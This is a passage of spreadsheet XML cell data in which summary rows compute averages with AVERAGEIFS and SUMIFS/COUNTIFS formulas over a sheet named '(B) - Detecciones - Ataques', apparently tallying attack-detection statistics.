        <v>12</v>
      </c>
      <c r="DD159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>3.1</v>
      </c>
      <c r="DI159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ159" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>2</v>
      </c>
      <c r="DK159" s="271"/>
    </row>
    <row r="160">
      <c r="J160" s="277"/>
      <c r="K160" s="512"/>
      <c r="L160" s="512"/>
      <c r="M160" s="512"/>
      <c r="N160" s="512"/>
      <c r="O160" s="278"/>
      <c r="Q160" s="271"/>
      <c r="R160" s="352" t="s">
        <v>2584</v>
      </c>
      <c r="S160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1666666667</v>
      </c>
      <c r="T160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.001315789474</v>
      </c>
      <c r="V160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="W160" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Y160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Z160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.08386775763</v>
      </c>
      <c r="AA160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AB160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="AC160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.1</v>
      </c>
      <c r="AD160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AE160" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AF160" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BT$3:$BT$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.01</v>
      </c>
      <c r="AG160" s="271"/>
      <c r="AH160" s="352" t="s">
        <v>2584</v>
      </c>
      <c r="AI160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AR160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0</v>
      </c>
      <c r="AS160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0</v>
      </c>
      <c r="AV160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0</v>
      </c>
      <c r="AY160" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB160" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="BD160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="BN160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0</v>
      </c>
      <c r="BO160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="BZ160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA160" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC160" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="CI160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0</v>
      </c>
      <c r="CQ160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0</v>
      </c>
      <c r="CU160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH160" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI160" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ160" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0</v>
      </c>
      <c r="DK160" s="271"/>
    </row>
    <row r="161">
      <c r="J161" s="277"/>
      <c r="K161" s="512"/>
      <c r="L161" s="512"/>
      <c r="M161" s="512"/>
      <c r="N161" s="512"/>
      <c r="O161" s="278"/>
      <c r="Q161" s="271"/>
      <c r="R161" s="352" t="s">
        <v>2585</v>
      </c>
      <c r="S161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1685275081</v>
      </c>
      <c r="T161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
